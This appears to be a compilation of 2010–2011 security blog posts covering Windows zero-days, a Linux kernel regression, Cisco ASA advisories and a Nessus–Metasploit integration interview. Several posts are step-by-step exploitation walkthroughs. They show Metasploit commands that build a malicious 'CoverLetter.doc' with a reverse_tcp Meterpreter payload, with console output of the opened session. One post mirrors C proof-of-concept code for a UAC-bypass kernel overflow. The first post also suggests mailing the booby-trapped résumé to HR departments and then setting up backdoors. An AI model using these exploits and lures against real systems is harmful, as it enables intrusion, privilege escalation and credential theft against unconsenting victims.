With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

• I used Vmware Workstation with two hosts (XP, and BT4)
• I tested this against a Windows XP SP3 host
• I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
• Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

• Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.

• Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection

• Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Updated with Q&A section at the bottom.

As referenced in my last post, a public release  proof of concept (POC) for bypassing the  User Access Control (UAC) feature on Windows Vista and 7 operating systems is in the wild. The vulnerability is a buffer overflow in kernel (win32k.sys). The vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key.

The author’s PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges). The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys.

According to the author of the POC code ,” I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.”

POC Test:

Version Windows 7 Professional

Steps:

1. I first created a standard none privileged user, and from the command prompt typed “whoami” to identify my user, I then typed “net users” to few all available users on the system. Lastly I tried to create a new user with “NET USER testhack P@$$w0rd /add” and received access denied as expected.
2. Next download the POC code, and extract it to a folder of your choice, then from the command prompt change directory to that folder and execute the “poc.exe” file. From here on you will have escalated privileges of the “nt/system user”.

At this point it’s GAME OVER!!

Updated with a few questions I emailed the author of the POC exploit

Me: How did you get your start in information security?

POC Author: By the randomness of the universe, I started one day when I discovered debugging

Me: How long have you been doing exploit development?

POC Author: I’ve been doing reverse engineering since 2004 but not exclusively in exploit development.

Me: How did you discovered this flaw?

POC Author: By chance when I read WDK or windows driver kit code samples

Me: What steps did you take to notify the vendor about this issue? What time line did Microsoft give for a patch to this issue?

POC Author: This flaw was reported with enough detail and the same PoC released on the internet to Microsoft Security Response Center  MSRC. They didn’t give a time line. Actually the guy who was issued to work on this never contacted me!

Me: Since this disclosure were you contacted by Microsoft or anyone else who were upset about your decision to disclose this flaw?

POC Author: No, despite the fact that my initial CodeProject article were brought down, probably due to the pressure from MS.

Me: Realistically how long do you think it will take before this flaw is patched?

POC Author: First of all I wouldn’t pick a day before Thanksgiving to publish this if I’m not mad enough that this flaw remains unpatched almost a year since Microsoft’s first acknowledge. Due to the nature that the flaw is from the design of an API, and it has been widely used by third party drivers, probably this won’t be entirely fixed until Windows 8. But meanwhile, MS could have taken measures to block such exploits, such as restricting the API not to query certain types of value to avoid ambiguity.

Me: Were you giving a reason by codeprojects for pulling your posting?

POC Author: Yes, they give me the responsible disclosure thing.

Additional comments by author:

If I have to keep my mouth shut until MS release a patch for such exploit, then probably everyone will be threatened more than now, because from what I know, there had been malware which use this exploit since August, not none said by some security companies. Those exploit a registry key ActiveTimeBias which works perfectly on all versions of Windows, to bypass proactive defense and execute malicious code.

I must say thank you for answering my questions and I support your decision for releasing this PoC and details about the flaw, if MS was given a full year to take care of this and they didn’t even respond to you why should you keep quiet!

References:

http://isc.sans.edu/diary.html?storyid=9988

http://www.exploit-db.com/exploits/15609/

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

License

About the Author

noobpwnftw

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post, being a fan of both Metasploit and Nessus I was very happy when I saw a tweet a month or so back making mention of a project that would bring both of these wonderful tools together in a nice easy to use fashion. That project was labeled ” Nessus Bridge for Metasploit”. The basic goal behind this project was to  “allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines form the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories below and are covered in details over at the http://blog.zate.org .

• Generic Commands
• Reports Commands
• Scan Commands
• Plugin Commands
• User Commands
• Policy Commands

A few prerequisites are needed before you can start hacking away:

• A host with Metasploit installed and configured (I recommend BackTrack 4)
• A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
• A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

1. First fire-up  both Metasploit and Nessus and run an update to ensure you have the latest signatures.
2. Login into Nessus and create your scanning policy
3. Close out your browser and prepare to have some fun CLI style!
   1. Load up the nessus module within msfconle with “load nessus”
   2. Next connect to your nessus server with “nessus_connect username:password@host:port ok”
   3. From this point on you can view all polices, perform a scan, import the rules and then use db_autopwn to seal the deal.
      Using nessus_policy_list and nessus_scan_new

   Import scan results with “nessus_report_get report id”

   db_autopwn

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else
to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought what if i could stick that library in Metasploit and talk directly to the my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which i used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work .

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what’s the best approach?Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploit – fork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

A: You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code
when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

//

The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

Sample exploit is already in the wild as show via http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not a expert in exploit development or analysis I will sit back and wait for the guys over at Metasploit or SET to whip up so I can test.

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (http://www.exploit-db.com), averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:

1– http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/

2 – http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerability/

Enjoy,
Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

I received notification of the following vulnerabilities outlined below via the full disclosure mail list but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organization depend on their Firewall as the primary means of protection against the many threats on the  internet.

The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

SunRPC Inspection Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

Transport Layer Security (TLS) Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

As a side note I would like to add that unless you are already running on version 8.3 you should disable the vulnerable services and take a moment to read the release note for version 8.3.

The are some syntax changes you have to adjust too, as well as do a full rule set conversion. Below is an example of an old rule and its recommended migrated counterpart. Some of the migrated rules and not all new since the were supported in older IOS version, however its now mandatory to do them the proper/recommended way instead of the older way.

Old Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Migrated Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 access-list 1 extended permit tcp any host 10.50.50.50 eq 80

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

Issue:

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

•

Disable the displaying of icons for shortcuts Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe. 1. Click Start, click Run, type Regedit in the Open box, and then click OK 2. Locate and then click the following registry key: HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler 3. Click the File menu and select Export 4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save Note This will create a backup of this registry key in the My Documents folder by default 5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter. 6. Restart explorer.exe or restart the computer. Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

•

Disable the WebClient service Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet. To disable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Disabled. If the service is running, click Stop. 4. Click OK and exit the management application. Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer. How to undo the workaround. To re-enable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Automatic. If the service is not running, click Start. 4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

Click OK and exit the management application.

In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

• MS10-042 – (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
• MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
• MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
• MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

After seeing all the buzz on twitter about the newly discovered Microsoft zero day, I decided to try and replicate it in my lab and just act as another source for bringing about some awareness on the issue at hand.

According to  Microsoft Security Advisory (2219475),  Microsoft is investigating new public reports of a possible vulnerability in the Windows Help and Support Center function that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. Microsoft is aware that proof of concept exploit code has been published for the vulnerability. However, Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

In short  you are  affected if you are running any of the following OS:

• Windows XP Service Pack 2 and Windows XP Service Pack 3
• Windows XP Professional x64 Edition Service Pack 2
• Windows Server 2003 Service Pack 2
• Windows Server 2003 x64 Edition Service Pack 2
• Windows Server 2003 with SP2 for Itanium-based Systems

The advisory was prompted by the bug’s disclosure early Thursday , and the release of proof-of-concept attack code. Tavis Ormandy, a security engineer who works for Google in Switzerland, defended the decision to reveal the flaw only five days after reporting it to Microsoft. But Microsoft and other researchers questioned the quick publication.

Now I am somewhat on the fences with this one, I can see how responsible disclosure would have been ideal in this case for Microsoft. This would have given MS some more time to get a fully tested patch out. On the flip side I think knowing in advance can give us as defender a fighting chance since the disclosure to patch cycle can be a pretty lengthy process, and the “bad guys” could have already been using this for a long time now.

While trying to test this I was running into some issues then I was pointed to the following pastebin entry from the helpful guys over at http://www.skullsecurity.org/blog/ IRC.

POC testing with Metasploit Test #1:

I  started by testing the current exploit from the Metasploit framework on my BT4 VM, while attacking my Windows 7 workstation which had MSE installed. Since the release notes stated that Windows 7 is not affected I just wanted to see what type of effect it would have. I loaded up my Backtrack VM, lauched MSF and use the following commands.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

And as expected it failed!

Fig-1 Failed against Win7

Interestingly enough Microsoft Security Essentials was able to detect this while my Comodo Internet security suite did not.Fig-2 MSE detected Exploit attempt

I was then able to browse my temporary internet folder and detected the html page with the malicious Iframe.

Fig-3 Malicious Iframe

POC testing with Metasploit Test #2:

I then went on to try this on a newly build Windows XP SP3 and it kept failing, now after running the 74 or so Windows updates I attempted to try it again and I was sucessful. So it is always important to run updates .

I started this second test by loading up my BackTrack VM and repeating the same steps as above, then once this is setup I then went over to my Windows XP test machine and connected to http://backtrackmachine, so and just sit back and watch Metasploit with the Meterpreter payload do its thing.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

Fig-4 XP Successfully Exploited

Fig-5 Game over

As you can see form Fig-5  above the payload was deployed successfully and I was able to run a simple ipconfig command to verify that I was on the victim system with IP address 192.168.126.134.  I also went back over to the XP machine and ran netstat -an to verify that I was connected to the BackTrack VM via the listening port 4444.

Fig-6 WinXP Netstat -an

Now I noticed a few things on the victim test XP machine, once I connected to the malicous URL, (which with all the socail media outlets its just too easy to get an average user to click on a link ):

• I saw a command prompt pop-up and disappeared after 1-2 seconds
• I notice my Windows media player launched itself
• Lastly the “Help and Support Center” page was launched

Now for the average user some of these things might not always send up a red flag. However for anyone remotely security conscious if you ever notice a few of these random acts of weirdness its time to get out that clean backup image and start the nuke and pave process.

References

http://www.computerworld.com/s/article/9177966/Microsoft_confirms_critical_Windows_XP_bug

http://www.microsoft.com/technet/security/advisory/2219475.mspx

http://seclists.org/fulldisclosure/2010/Jun/205

http://www.offensive-security.com/metasploit-unleashed/metasploit-unleashed-free-information-security-training